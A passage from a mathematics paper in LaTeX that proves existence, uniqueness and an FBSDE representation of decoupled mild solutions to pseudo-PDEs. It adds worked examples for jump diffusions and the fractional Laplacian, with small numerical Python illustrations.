\mathbbm{E}^{s,x}[(N^{s,x})^2_t]&=&\mathbbm{E}^{s,x}\left[\left(\mathbbm{E}^{s,x}\left[g(X_T)+\int_s^T f(r,X_r,u(r,X_r),v(r,X_r))dV_r|\mathcal{F}_t\right]-u(s,x)\right)^2\right]\\
&\leq& 3u^2(s,x) + 3\mathbbm{E}^{s,x}[g^2(X_T)] + 3(V_T-V_s)\mathbbm{E}^{s,x}\left[\int_s^T f^2(r,X_r,u(r,X_r),v(r,X_r))dV_r\right]\\
&<& \infty,
\end{array}
\end{equation}
where the second term is finite because of $H^{mom}(\zeta,\eta)$ and $H^{growth}(\zeta,\eta)$, and the same also holds for the third one because $f\left(\cdot,\cdot,u,v\right)$ belongs to $\mathcal{L}^2_X$, see Lemma \ref{LemmaMild}. So $N^{s,x}$ is square integrable. We have therefore shown that under any $\mathbbm{P}^{s,x}$, the process $u(\cdot,X_{\cdot})-u(s,x)+\int_s^{\cdot}f(r,X_r,u(r,X_r),v(r,X_r))dV_r$ has on $[s,T]$ a modification in $\mathcal{H}^2_0$. Definitions \ref{domainextended} and \ref{extended} justify that $u\in\mathcal{D}(\mathfrak{a})$,
$\mathfrak{a}(u)=-f(\cdot,\cdot,u,v)$ and that for any $(s,x)\in[0,T]\times E$, $M[u]^{s,x}=N^{s,x}$.
\\
To conclude that $u$ is a martingale solution of $Pseudo-PDE(f,g)$, it remains to show that $\mathfrak{G}(u,u)=v^2$, up to zero potential sets. By Proposition \ref{P321}, this is equivalent to showing that for every $(s,x)\in[0,T]\times E$,
\\
$\langle N^{s,x}\rangle = \int_s^{\cdot}v^2(r,X_r)dV_r$,
in the sense of indistinguishability.
\\
\\
We fix again $(s,x)\in[0,T]\times E$ and the associated probability, and now set
\\
$N'_t:=u^2(t,X_t)-u^2(s,x)-\int_s^t(v^2-2uf(\cdot,\cdot,u,v))(r,X_r)dV_r$. Combining the second line of \eqref{MildEq} applied at $(s,x)=(t,X_t)$ with the Markov property \eqref{Markov3}, and since $v^2,uf\left(\cdot,\cdot,u,v\right)$ belong to $\mathcal{L}^1_X$ (see Lemma \ref{LemmaMild}), we get the a.s. equalities
\begin{equation}
\begin{array}{rcl}
u^2(t,X_t) &=& P_{t,T}[g^2](X_t) - \int_t^TP_{t,r}\left[(v^2(r,\cdot)-2u(r,\cdot)f\left(r,\cdot,u(r,\cdot),v(r,\cdot)\right))\right](X_t)dV_r\\
&=& \mathbbm{E}^{t,X_t}\left[g^2(X_T)-\int_t^T(v^2-2uf(\cdot,\cdot,u,v))(r,X_r)dV_r\right] \\
&=& \mathbbm{E}^{s,x}\left[g^2(X_T)-\int_t^T(v^2- 2uf(\cdot,\cdot,u,v))(r,X_r)dV_r|\mathcal{F}_t\right],
\end{array}
\end{equation}
from which we deduce that for any $t\in[s,T]$,
\\
$N'_t=\mathbbm{E}^{s,x}\left[g^2(X_T)-\int_s^T (v^2- 2uf(\cdot,\cdot,u,v))(r,X_r)dV_r|\mathcal{F}_t\right]-u^2(s,x)$ a.s.
So $N'$ is a martingale. We can therefore consider on $[s,T]$ and under $\mathbbm{P}^{s,x}$, $N'^{s,x}$ the cadlag version of $N'$.
\\
The process $u^2(s,x)+ \int_s^{\cdot}(v^2-2uf(\cdot,\cdot,u,v))(r,X_r)dV_r + N'^{s,x}$ is therefore a cadlag special semi-martingale which is a $\mathbbm{P}^{s,x}$-version of $u^2(\cdot,X)$ on $[s,T]$. But we also had shown that
$U^{s,x}=u(s,x)- \int_s^{\cdot} f(r,X_r,u(r,X_r),v(r,X_r))dV_r + N^{s,x}$ is a version of $u(\cdot,X)$, which by integration by parts implies that
\\
$u^2(s,x)-2\int_s^{\cdot}U^{s,x}_rf(\cdot,\cdot,u,v)(r,X_r)dV_r+2\int_s^{\cdot}U^{s,x}_{r^-}dN^{s,x}_r+[N^{s,x}]$ is another cadlag semi-martingale which is a $\mathbbm{P}^{s,x}$-version of $u^2(\cdot,X)$ on $[s,T]$.
\\
$\int_s^{\cdot}(v^2-2uf(\cdot,\cdot,u,v))(r,X_r)dV_r + N'^{s,x}$ is therefore indistinguishable from
\\
$-2\int_s^{\cdot}U^{s,x}_rf(\cdot,\cdot,u,v)(r,X_r)dV_r+2\int_s^{\cdot}U^{s,x}_{r^-}dN^{s,x}_r+[N^{s,x}]$ which can be written $\langle N^{s,x}\rangle-2\int_s^{\cdot}U^{s,x}_rf(\cdot,\cdot,u,v)(r,X_r)dV_r +2\int_s^{\cdot}U^{s,x}_{r^-}dN^{s,x}_r+([N^{s,x}]-\langle N^{s,x}\rangle)$ where $\langle N^{s,x}\rangle-2\int_s^{\cdot}U^{s,x}_rf(\cdot,\cdot,u,v)(r,X_r)dV_r$ is predictable with bounded variation and $2\int_s^{\cdot}U^{s,x}_{r^-}dN^{s,x}_r+([N^{s,x}]-\langle N^{s,x}\rangle)$ is a local martingale. By uniqueness of the decomposition of a special semi-martingale, we have
\\
$\int_s^{\cdot}(v^2-2uf(\cdot,\cdot,u,v))(r,X_r)dV_r=\langle N^{s,x}\rangle-2\int_s^{\cdot}U^{s,x}_rf(\cdot,\cdot,u,v)(r,X_r)dV_r$, and by Lemma \ref{ModifImpliesdV},
$\int_s^{\cdot}(v^2-2uf(\cdot,\cdot,u,v))(r,X_r)dV_r=\langle N^{s,x}\rangle-2\int_s^{\cdot}uf(\cdot,\cdot,u,v)(r,X_r)dV_r$, which finally yields $\langle N^{s,x}\rangle=\int_s^{\cdot}v^2(r,X_r)dV_r$ as desired.
\end{proof}
We recall that $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times E}$ is
a Markov class associated to a transition function measurable
in time (see Definitions \ref{defMarkov} and \ref{DefFoncTrans}) which
fulfills Hypothesis \ref{MPwellposed},
i.e. it is a solution of a well-posed Martingale Problem associated with
the triplet $(\mathcal{D}(a),a,V)$.
Moreover we suppose Hypothesis $H^{mom}(\zeta,\eta)$ for some positive
$\zeta,\eta$, see Hypothesis \ref{HypMom}.
\begin{theorem}\label{MainTheorem}
Let $(f,g)$ be a couple verifying $H^{lip}(\zeta,\eta)$, see Hypothesis
\ref{Hpq}.
Then $Pseudo-PDE(f,g)$ has a unique decoupled mild solution.
\end{theorem}
\begin{proof}
This derives from Theorem \ref{RMartExistenceUniqueness} and Propositions \ref{MartingaleImpliesMild}, \ref{MildImpliesMartingale}.
\end{proof}
\begin{corollary}\label{CoroClassicMild}
Assume that $(f,g)$ verifies $H^{lip}(\zeta,\eta)$, see Hypothesis \ref{Hpq}.
A classical solution $u$ of $Pseudo-PDE(f,g)$ such that
$\Gamma(u,u)\in\mathcal{L}^1_X$, is also a decoupled mild solution.
\\
Conversely, if $u$ is a decoupled mild solution of $Pseudo-PDE(f,g)$
belonging to $\mathcal{D}(a)$, then $u$ is a classical solution of $Pseudo-PDE(f,g)$ up to a zero-potential set, meaning that the first equality of \eqref{PDE} holds up to a set of zero potential.
\end{corollary}
\begin{proof}
The statement holds by Proposition \ref{MildImpliesMartingale} and Proposition \ref{CoroClassic}.
\end{proof}
\subsection{Representation of the solution via FBSDEs with no driving martingale}\label{FBSDEs}
In the companion paper \cite{paper1preprint}, the following family of FBSDEs with no driving martingale indexed by $(s,x)\in[0,T]\times E$ was introduced.
\begin{definition}
Let $(s,x)\in[0,T]\times E$ and the associated stochastic basis $\left(\Omega,\mathcal{F}^{s,x},(\mathcal{F}^{s,x}_t)_{t\in[0,T]},\mathbbm{P}^{s,x}\right)$ be fixed. A couple
\\
$(Y^{s,x},M^{s,x})\in\mathcal{L}^2(dV\otimes d\mathbbm{P}^{s,x})\times\mathcal{H}^2_0$ will be said to solve $FBSDE^{s,x}(f,g)$ if it verifies on $[0,T]$,
in the sense of indistinguishability
\begin{equation}\label{BSDE}
Y^{s,x} = g(X_T) + \int_{\cdot}^T f\left(r,X_r,Y^{s,x}_r,\sqrt{\frac{d\langle M^{s,x}\rangle}{dV}}(r)\right)dV_r -(M^{s,x}_T - M^{s,x}_{\cdot}).
\end{equation}
If \eqref{BSDE} is only satisfied on a smaller interval $[t_0,T]$, with $0<t_0<T$, we say that $(Y^{s,x},M^{s,x})$ solves $FBSDE^{s,x}(f,g)$ on $[t_0,T]$.
\end{definition}
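For intuition in the classical Brownian setting (an illustration only, since in the present framework no driving martingale is given a priori), if $M^{s,x}=\int_s^{\cdot}Z_r dB_r$ for a Brownian motion $B$ and $V_t=t$, then

```latex
\sqrt{\frac{d\langle M^{s,x}\rangle}{dV}}(r)
  = \sqrt{\frac{d}{dr}\int_s^r Z_\theta^2\,d\theta}
  = |Z_r|,
```

so that \eqref{BSDE} takes the form of a classical Markovian BSDE with driver evaluated at $|Z_r|$.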
The following result follows from Theorem 3.22 in \cite{paper1preprint}.
\begin{theorem}\label{SolBSDE}
Assume that $(f,g)$ verifies $H^{lip}(\zeta,\eta)$, see Hypothesis \ref{Hpq}.
Then for any
$(s,x)\in[0,T]\times E$, $FBSDE^{s,x}(f,g)$ has a unique solution.
\end{theorem}
In the following theorem, we summarize the links between the $FBSDE^{s,x}(f,g)$ and the notion of martingale solution of $Pseudo-PDE(f,g)$.
These are shown in Theorem 5.14, Remark 5.15, Theorem 5.20 and Theorem 5.21 of \cite{paper1preprint}.
\begin{theorem}\label{Defuv}
Assume that $(f,g)$ verifies $H^{lip}(\zeta,\eta)$ (see Hypothesis \ref{Hpq})
and let $(Y^{s,x}, M^{s,x})$ denote the (unique) solution of $FBSDE^{s,x}(f,g)$ for fixed $(s,x)$.
Let $u$ be the unique martingale solution
of $Pseudo-PDE(f,g)$.
For every
$(s,x)\in[0,T]\times E$, on the interval $[s,T]$,
\begin{itemize}
\item $Y^{s,x}$ and $u(\cdot,X_{\cdot})$ are $\mathbbm{P}^{s,x}$-modifications, and equal $dV\otimes d\mathbbm{P}^{s,x}$ a.e.;
\item $M^{s,x}$ and $M[u]^{s,x}$ are $\mathbbm{P}^{s,x}$-indistinguishable.
\end{itemize}
Moreover $u$ belongs to $\mathcal{L}^2_X$ and
for any $(s,x)\in[0,T]\times E$, we have
$\frac{d\langle M^{s,x}\rangle}{dV}=\mathfrak{G}(u,u)(\cdot,X_{\cdot})$ $dV\otimes d\mathbbm{P}^{s,x}$ a.e.
\end{theorem}
\begin{remark} The martingale solution $u$ of $Pseudo-PDE(f,g)$ exists
and is unique
by Theorem \ref{RMartExistenceUniqueness}.
\end{remark}
We can therefore represent the unique decoupled mild solution of $Pseudo-PDE(f,g)$ via the stochastic equations $FBSDE^{s,x}(f,g)$ as follows.
\begin{theorem}\label{Representation}
Assume that $(f,g)$ verifies $H^{lip}(\zeta,\eta)$ (see Hypothesis
\ref{Hpq})
and let $(Y^{s,x}, M^{s,x})$ denote the (unique) solution of $FBSDE^{s,x}(f,g)$ for fixed $(s,x)$.
\\
Then for any $(s,x)\in[0,T]\times E$, the random variable $Y^{s,x}_s$ is $\mathbbm{P}^{s,x}$ a.s. equal to a constant (which we still denote $Y^{s,x}_s$), and the function
\begin{equation}
u:(s,x)\longmapsto Y^{s,x}_s
\end{equation}
is the unique decoupled mild solution of $Pseudo-PDE(f,g)$.
\end{theorem}
\begin{proof}
By Theorem \ref{Defuv}, there exists a Borel function $u$ such that for every $(s,x)\in[0,T]\times E$, $Y^{s,x}_s=u(s,X_s)=u(s,x)$ $\mathbbm{P}^{s,x}$ a.s. and $u$ is the unique martingale solution of $Pseudo-PDE(f,g)$. By Proposition \ref{MartingaleImpliesMild}, it is also its unique decoupled mild solution.
\end{proof}
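Purely for intuition, the representation $u(s,x)=Y^{s,x}_s$ can be probed numerically in a very particular linear case which lies outside the fixed-point machinery: when $f$ does not depend on $(y,z)$, the first line of \eqref{MildEq} gives directly $u(s,x)=\mathbbm{E}^{s,x}[g(X_T)+\int_s^T f(r,X_r)dV_r]$, a Feynman-Kac-type average. A naive Monte Carlo sketch of this quantity, assuming $X$ is a one-dimensional standard Brownian motion and $V_t=t$ (the function name `mc_u` and all parameters are ours, not from the paper):

```python
import math
import random

def mc_u(s, x, g, f, T=1.0, n_paths=20000, n_steps=50, seed=0):
    """Monte Carlo estimate of u(s,x) = E^{s,x}[ g(X_T) + int_s^T f(r, X_r) dr ]
    for X a standard one-dimensional Brownian motion started at x at time s,
    in the linear case where the driver f does not depend on (y, z)."""
    rng = random.Random(seed)
    dt = (T - s) / n_steps
    total = 0.0
    for _ in range(n_paths):
        X, t, integral = x, s, 0.0
        for _ in range(n_steps):
            integral += f(t, X) * dt                   # left-point rule for the dV_r = dr integral
            X += math.sqrt(dt) * rng.gauss(0.0, 1.0)   # exact Brownian increment over dt
            t += dt
        total += g(X) + integral
    return total / n_paths

# Sanity check: f = 0 and g(x) = x^2 give u(s, x) = x^2 + (T - s).
est = mc_u(0.0, 0.0, g=lambda y: y * y, f=lambda t, y: 0.0)
print(est)  # close to 1.0 up to Monte Carlo error
```

Of course, in the genuinely nonlinear case $f=f(t,x,y,z)$ no such direct averaging is available; this is precisely where the fixed-point argument behind Theorem \ref{RMartExistenceUniqueness} intervenes.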
\begin{remark} \label{R317}
The function $v$ such that $(u,v)$ is the unique solution of the identification problem $IP(f,g)$ also has a stochastic representation since it verifies for every $(s,x)\in[0,T]\times E$, on the interval $[s,T]$,
\\
$\frac{d\langle M^{s,x}\rangle}{dV}=v^2(\cdot,X_{\cdot})$ $dV\otimes d\mathbbm{P}^{s,x}$ a.e. where $M^{s,x}$ is the martingale part of the solution of $FBSDE^{s,x}$.
\end{remark}
Conversely, under the weaker condition $H^{growth}(\zeta,\eta)$, if one knows the solution of $IP(f,g)$, one can (for every $(s,x)$) produce a version of
a solution of $FBSDE^{s,x}(f,g)$ as follows. This is only possible with the notion of decoupled mild solution:
even in the case of Brownian BSDEs the knowledge of the viscosity solution
of the related PDE would (in general) not be sufficient to reconstruct the
family of solutions of the BSDEs.
\begin{proposition}\label{MildImpliesBSDE}
Assume that $(f,g)$ verifies $H^{growth}(\zeta,\eta)$, see Hypothesis \ref{Hpqeq}.
Suppose the existence of a solution $(u,v)$ to $IP(f,g)$, and let $(s,x)\in[0,T]\times E$ be fixed.
Then
\begin{equation}
\left(u(\cdot,X),\quad u(\cdot,X)-u(s,x)+\int_s^{\cdot}f(\cdot,\cdot,u,v)(r,X_r)dV_r\right)
\end{equation}
admits on $[s,T]$ a $\mathbbm{P}^{s,x}$-version $(Y^{s,x},M^{s,x})$
which solves $FBSDE^{s,x}$ on $[s,T]$.
\end{proposition}
\begin{proof}
By Proposition \ref{MildImpliesMartingale}, $u$ is a martingale solution of $Pseudo-PDE(f,g)$ and $v^2=\mathfrak{G}(u,u)$. We now fix $(s,x)\in[0,T]\times E$. Combining Definitions \ref{extended}, \ref{extendedgamma} and \ref{D417}, we know that $u(T,\cdot)=g$ and that on $[s,T]$, $u(\cdot,X)$ has a $\mathbbm{P}^{s,x}$-version $U^{s,x}$ with decomposition
$U^{s,x}=u(s,x)-\int_s^{\cdot}f(\cdot,\cdot,u,v)(r,X_r)dV_r +M[u]^{s,x}$, where $M[u]^{s,x}$ is an element of $\mathcal{H}^2_0$ whose angle bracket is $\int_s^{\cdot}v^2(r,X_r)dV_r$ and which is a version of $u(\cdot,X)-u(s,x)+\int_s^{\cdot}f(\cdot,\cdot,u,v)(r,X_r)dV_r$. By Lemma \ref{ModifImpliesdV}, taking into account
$u(T,\cdot)=g$, the couple $(U^{s,x},M[u]^{s,x})$ verifies on $[s,T]$, in the sense of indistinguishability
\begin{equation}
U^{s,x} = g(X_T)+\int_{\cdot}^Tf\left(r,X_r,U^{s,x}_r,\sqrt{\frac{d\langle M[u]^{s,x}\rangle}{dV}}(r)\right)dV_r -(M[u]^{s,x}_T-M[u]^{s,x}_{\cdot})
\end{equation}
with $M[u]^{s,x}\in\mathcal{H}^2_0$ verifying $M[u]^{s,x}_s=0$ (see Definition \ref{extended}) and $U^{s,x}_s$ is deterministic so in particular
is a square integrable r.v.
Following a slight adaptation of
the proof of Lemma 3.25 in \cite{paper1preprint}
(see Remark \ref{RAdaptation} below), this implies that $U^{s,x}\in\mathcal{L}^2(dV\otimes d\mathbbm{P}^{s,x})$ and therefore
that $(U^{s,x},M[u]^{s,x})$ is a solution of $FBSDE^{s,x}(f,g)$
on $[s,T]$.
\end{proof}
\begin{remark} \label{RAdaptation}
Indeed Lemma 3.25 in \cite{paper1preprint}, taking into account Notation 5.5
ibidem can be formally applied only under $H^{lip}(\zeta,\eta)$ for $(f,g)$.
However, the same proof easily
allows an extension to our framework $H^{growth}(\zeta,\eta)$.
\end{remark}
\section{Examples of applications}\label{exemples}
We now develop some examples. Some of the applications that we are interested in involve operators which only act on the space variable, and we will extend them to time-dependent functions. The reader may consult
Appendix \ref{SC}, concerning details about such extensions.
In all the items below there will be a canonical Markov class with transition function
measurable in time which is solution of a well-posed Martingale Problem associated to some triplet
$(\mathcal{D}(a),a,V)$ as introduced in Definition \ref{MartingaleProblem}. Therefore all the results of
this paper will apply to all the examples below, namely Theorem \ref{RMartExistenceUniqueness}, Propositions \ref{CoroClassic}, \ref{MartingaleImpliesMild} and \ref{MildImpliesMartingale}, Theorem \ref{MainTheorem}, Corollary \ref{CoroClassicMild}, Theorems \ref{SolBSDE}, \ref{Defuv} and \ref{Representation} and Proposition \ref{MildImpliesBSDE}. In particular, Theorem \ref{MainTheorem}
states in all the cases, under suitable Lipschitz type conditions for the driver $f$,
that the corresponding Pseudo-PDE admits a unique decoupled mild solution.
In all the examples $T \in\mathbbm{R}_+^*$ will be fixed.
\subsection{Markovian jump diffusions}\label{S4a}
In this subsection, the state space will be $E:=\mathbbm{R}^d$ for some $d\in\mathbbm{N}^*$.
We are given $\mu\in\mathcal{B}([0,T]\times \mathbbm{R}^d, \mathbbm{R}^d)$, $\alpha\in\mathcal{B}([0,T]\times \mathbbm{R}^d,S^*_+(\mathbbm{R}^d))$
(where $S^*_+(\mathbbm{R}^d)$ is the space of symmetric strictly positive definite matrices of size $d$) and $K$ a L\'evy kernel: this means that for every $(t,x)\in [0,T]\times \mathbbm{R}^d$, $K(t,x,\cdot)$ is a $\sigma$-finite measure
on $\mathbbm{R}^d\backslash\{0\}$, $\underset{t,x}{\text{sup}}\int \frac{\|y\|^2}{1+\|y\|^2}K(t,x,dy)<\infty$ and for every Borel set $A\in\mathcal{B}(\mathbbm{R}^d\backslash\{0\})$,
$(t,x)\longmapsto \int_A \frac{\|y\|^2}{1+\|y\|^2}K(t,x,dy)$ is Borel.
We will consider the operator $a$ defined by
\begin{equation} \label{PIDE}
\partial_t\phi + \frac{1}{2}Tr(\alpha\nabla^2\phi) + (\mu,\nabla \phi) +\int\left(\phi(\cdot,\cdot+y)-\phi-\frac{(y,\nabla \phi)}{1+\|y\|^2}\right)K(\cdot,\cdot,dy),
\end{equation}
on the domain $\mathcal{D}(a)$ which is here the linear algebra
$\mathcal{C}^{1,2}_b([0,T]\times\mathbbm{R}^d,\mathbbm{R})$ of real continuous bounded functions on $[0,T]\times \mathbbm{R}^d$ which are continuously differentiable in the first variable with bounded derivative, and twice continuously differentiable in the second variable with bounded derivatives.
\\
\\
Concerning martingale problems associated to parabolic PDE operators, one may consult \cite{stroock}. Since we want to include integral operators, we will adopt the formalism of D.W. Stroock in \cite{stroock1975diffusion}. Theorem 4.3 therein, together with the penultimate sentence of its proof, states the following.
\begin{theorem}\label{Stroock}
Suppose that $\mu$ is bounded, that $\alpha$ is bounded continuous
and that for any $A\in\mathcal{B}(\mathbbm{R}^d\backslash\{0\})$,
$(t,x)\longmapsto \int_A \frac{y}{1+\|y\|^2}K(t,x,dy)$ is bounded continuous.
Then, for every $(s,x)$, there exists a unique probability $\mathbbm{P}^{s,x}$ on the canonical space (see Definition \ref{canonicalspace}) such that $\phi(\cdot,X_{\cdot})-\int_s^{\cdot}a(\phi)(r,X_r)dr$ is a local martingale for any $\phi\in\mathcal{D}(a)$ and $\mathbbm{P}^{s,x}(X_s=x)=1$.
Moreover $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times\mathbbm{R}^d}$ defines a Markov class and its transition function is measurable in time.
\end{theorem}
The Martingale Problem associated to $(\mathcal{D}(a),a,V_t \equiv t)$
in the sense of Definition \ref{MartingaleProblem} is therefore well-posed and solved by $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times\mathbbm{R}^d}$.
In this context, $\mathcal{D}(a)$ is an algebra and for $\phi,\psi$ in $\mathcal{D}(a)$, the carr\'e du champs operator is given by
\begin{equation}
\Gamma(\phi,\psi) = \underset{i,j\leq d}{\sum}\alpha_{i,j}\partial_{x_i}\phi\partial_{x_j}\psi+\int_{\mathbbm{R}^d\backslash\{0\}}(\phi(\cdot,\cdot+y)-\phi)(\psi(\cdot,\cdot+y)-\psi)K(\cdot,\cdot,dy).\nonumber
\end{equation}
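For the reader's convenience, here is a quick formal check of this expression (a standard computation, not needed in the sequel) from the definition $\Gamma(\phi,\psi)=a(\phi\psi)-\phi a(\psi)-\psi a(\phi)$: the $\partial_t$ and first order terms cancel by the Leibniz rule, and the remaining terms give
\begin{equation}
\begin{array}{rcl}
\Gamma(\phi,\psi)&=&\frac{1}{2}Tr\left(\alpha\left(\nabla^2(\phi\psi)-\phi\nabla^2\psi-\psi\nabla^2\phi\right)\right)\\
&&+\int\left((\phi\psi)(\cdot,\cdot+y)-\phi\psi-\phi(\psi(\cdot,\cdot+y)-\psi)-\psi(\phi(\cdot,\cdot+y)-\phi)\right)K(\cdot,\cdot,dy)\\
&=&\underset{i,j\leq d}{\sum}\alpha_{i,j}\partial_{x_i}\phi\partial_{x_j}\psi+\int_{\mathbbm{R}^d\backslash\{0\}}(\phi(\cdot,\cdot+y)-\phi)(\psi(\cdot,\cdot+y)-\psi)K(\cdot,\cdot,dy),\nonumber
\end{array}
\end{equation}
since $\nabla^2(\phi\psi)-\phi\nabla^2\psi-\psi\nabla^2\phi=\nabla\phi(\nabla\psi)^T+\nabla\psi(\nabla\phi)^T$ and the jump integrand factorizes by direct expansion.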
\\
In order to obtain a general result without having to make considerations on the integrability of $X$, we consider a couple $(f,g)$ satisfying $H^{lip}_b$,
meaning in particular that $g$ and $f(\cdot,\cdot,0,0)$ are bounded.
\begin{proposition}
Under the assumptions of Theorem \ref{Stroock}, and if $(f,g)$ verify $H^{lip}_b$ (see Hypothesis \ref{Hpq}), $Pseudo-PDE(f,g)$ admits a unique decoupled mild solution in the sense of Definition \ref{mildsoluv}.
\end{proposition}
\begin{proof}
$\mathcal{D}(a)$ is an algebra. Moreover $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times\mathbbm{R}^d}$ is a Markov class which is measurable in time, and it solves the well-posed Martingale Problem associated to $(\mathcal{D}(a),a,V_t\equiv t)$. Therefore our Theorem \ref{MainTheorem} applies.
\end{proof}
\subsection{Pseudo-Differential operators and Fractional Laplacian}\label{S4b}
This section concerns pseudo-differential operators with negative definite
symbol, see \cite{jacob2} for an extensive description. A typical example of such
operators will be the fractional Laplacian $(-\Delta)^{\frac{\alpha}{2}}$ with $\alpha\in]0,2[$, see Chapter 3 in \cite{di2012hitchhikers} for a detailed study of this operator. We will mainly use the notations and vocabulary of N. Jacob in
\cite{jacob1}, \cite{jacob2} and \cite{jacob2005pseudo}, some results being attributed to W. Hoh \cite{hoh}. We fix $d\in\mathbbm{N}^*$.
$\mathcal{C}^{\infty}_c(\mathbbm{R}^d)$ will denote the space of real functions defined on
$\mathbbm{R}^d$ which are infinitely continuously differentiable
with compact support and $\mathcal{S}(\mathbbm{R}^d)$ the Schwartz space
of fast decreasing real smooth functions also defined on $\mathbbm{R}^d$.
$\mathcal{F}u$ will denote the Fourier transform of a function $u$ whenever it is well-defined. For $u\in L^1(\mathbbm{R}^d)$ we use the convention $\mathcal{F}u(\xi)=\frac{1}{(2\pi)^{\frac{d}{2}}}\int_{\mathbbm{R}^d} e^{-i(x,\xi)}u(x)dx$.
\begin{definition}
A function $\psi\in\mathcal{C}(\mathbbm{R}^d,\mathbbm{R})$
will be said to be
\textbf{negative definite} if for any $k\in\mathbbm{N}$, $\xi_1,\cdots,\xi_k\in\mathbbm{R}^d$, the matrix
$(\psi(\xi_j)+\psi(\xi_l)-\psi(\xi_j-\xi_l))_{j,l=1,\cdots,k}$ is symmetric positive definite.
\\
\\
A function $q\in\mathcal{C}(\mathbbm{R}^d\times \mathbbm{R}^d,\mathbbm{R})$ will be called a \textbf{continuous negative definite symbol} if for any $x\in\mathbbm{R}^d$, $q(x,\cdot)$ is continuous negative definite.
\\
In this case we introduce
the pseudo-differential operator $q(\cdot,D)$ defined by
\begin{equation}
q(\cdot,D)(u)(x)=\frac{1}{(2\pi)^{\frac{d}{2}}}\int_{\mathbbm{R}^d} e^{i(x,\xi)}q(x,\xi)\mathcal{F}u(\xi)d\xi.
\end{equation}
\end{definition}
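As a purely numerical illustration (our own sketch: the sample points, the exponents and the helper name \texttt{criterion\_matrix} are arbitrary choices, not part of the theory), the matrix criterion above can be evaluated in dimension $1$ for the classical negative definite functions $\psi(\xi)=|\xi|^{\alpha}$, $\alpha\in]0,2]$; the resulting matrices are symmetric with non-negative spectrum.

```python
import numpy as np

# Hypothetical numerical check: for psi(xi) = |xi|^alpha with alpha in (0, 2],
# the matrices (psi(xi_j) + psi(xi_l) - psi(xi_j - xi_l))_{j,l} of the
# criterion should be symmetric with non-negative eigenvalues.
def criterion_matrix(points, alpha):
    psi = lambda xi: np.abs(xi) ** alpha
    xi = np.asarray(points, dtype=float)
    return psi(xi)[:, None] + psi(xi)[None, :] - psi(xi[:, None] - xi[None, :])

xi_points = [-1.5, 0.3, 2.0, 4.7]       # arbitrary fixed sample points
for alpha in (0.5, 1.0, 1.5, 2.0):
    M = criterion_matrix(xi_points, alpha)
    assert np.allclose(M, M.T)                   # symmetry
    assert np.linalg.eigvalsh(M).min() >= -1e-9  # non-negative spectrum
```

For $\alpha=2$ the matrix is exactly $(2\xi_j\xi_l)_{j,l}$, a rank-one positive semi-definite matrix, which makes the check transparent.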
\begin{remark}
By Theorem 4.5.7 in \cite{jacob1},
$q(\cdot,D)$ maps the space
$\mathcal{C}^{\infty}_c(\mathbbm{R}^d)$
of smooth functions with compact support
into itself.
In particular $q(\cdot,D)$ will be defined on
$\mathcal{C}^{\infty}_c(\mathbbm{R}^d)$. However, the proof of this Theorem 4.5.7 only uses the fact that if $\phi\in\mathcal{C}^{\infty}_c(\mathbbm{R}^d)$ then $\mathcal{F}\phi\in\mathcal{S}(\mathbbm{R}^d)$ and this still holds for
every $\phi\in\mathcal{S}(\mathbbm{R}^d)$. Therefore $q(\cdot,D)$ is well-defined on $\mathcal{S}(\mathbbm{R}^d)$ and maps it into
$\mathcal{C}(\mathbbm{R}^d,\mathbbm{R})$.
\end{remark}
A typical example of such pseudo-differential operators is the fractional
Laplacian defined for some fixed $\alpha\in]0,2[$ on $\mathcal{S}(\mathbbm{R}^d)$ by
\begin{equation}
(-\Delta)^{\frac{\alpha}{2}}(u)(x)=\frac{1}{(2\pi)^{\frac{d}{2}}}
\int_{\mathbbm{R}^d} e^{i(x,\xi)}\|\xi\|^{\alpha}\mathcal{F}u(\xi)d\xi.
\end{equation}
Its symbol has no dependence in $x$ and is the continuous negative definite function $\xi\mapsto \|\xi\|^{\alpha}$.
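As a purely numerical illustration (our own sketch, not part of the theory: the grid parameters, the Gaussian test function and the helper name \texttt{fractional\_laplacian} are arbitrary choices), the spectral definition above can be tested on a periodic grid via the discrete Fourier transform; for $\alpha=2$ the output must agree with $-u''$.

```python
import numpy as np

# Numerical sketch: apply (-Delta)^{alpha/2} spectrally on a periodic grid.
# For alpha = 2 this must coincide with -u''; here u is a Gaussian, so
# -u''(x) = (1 - x^2) exp(-x^2 / 2). Grid parameters are arbitrary.
N, L = 2048, 40.0
x = np.linspace(-L / 2, L / 2, N, endpoint=False)
xi = 2 * np.pi * np.fft.fftfreq(N, d=x[1] - x[0])  # angular frequencies

def fractional_laplacian(u, alpha):
    return np.real(np.fft.ifft(np.abs(xi) ** alpha * np.fft.fft(u)))

u = np.exp(-x**2 / 2)
err = np.max(np.abs(fractional_laplacian(u, 2.0) - (1 - x**2) * u))
assert err < 1e-6  # spectral accuracy for a rapidly decaying function
```

The same routine applied with $\alpha\in]0,2[$ gives a simple way to visualize the non-local character of $(-\Delta)^{\frac{\alpha}{2}}$ on rapidly decaying functions.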
Combining Theorem 4.5.12 and 4.6.6 in \cite{jacob2005pseudo}, one can state the following.
\begin{theorem}\label{ThmJacob1}
Let $\psi$ be a continuous negative definite function satisfying for some $r_0,c_0>0$: $\psi(\xi)\geq c_0\|\xi\|^{r_0}$ if $\|\xi\|\geq 1$. Let $M$ be the smallest integer strictly greater than $(\frac{d}{r_0}\vee 2)+d$. Let $q$ be a continuous negative definite symbol verifying, for some $c,c'>0$ and
$\gamma:\mathbbm{R}^d\rightarrow \mathbbm{R}^*_+$, the following items.
\begin{itemize}
\item $q(\cdot,0)=0$ and $\underset{x\in\mathbbm{R}^d}{\text{sup }}|q(x,\xi)|\underset{\xi\rightarrow 0}{\longrightarrow}0$;
\item $q$ is $\mathcal{C}^{2M+1-d}$ in the first variable and for any $\beta\in\mathbbm{N}^d$ with $\|\beta\|\leq 2M+1-d$, $\|\partial^{\beta}_x q\|\leq c(1+\psi)$;
\item $q(x,\xi)\geq \gamma(x)(1+\psi(\xi))$ if $x\in \mathbbm{R}^d$, $\|\xi\|\geq 1$;
\item $q(x,\xi)\leq c'(1+\|\xi\|^2)$ for every $(x,\xi)$.
\end{itemize}
Then the homogeneous Martingale Problem associated to $(-q(\cdot,D),\mathcal{S}(\mathbbm{R}^d))$ is well-posed (see Definition \ref{MPhomogene}) and its solution $(\mathbbm{P}^x)_{x\in\mathbbm{R}^d}$ defines a homogeneous Markov class, see Notation \ref{HomogeneNonHomogene}.
\end{theorem}
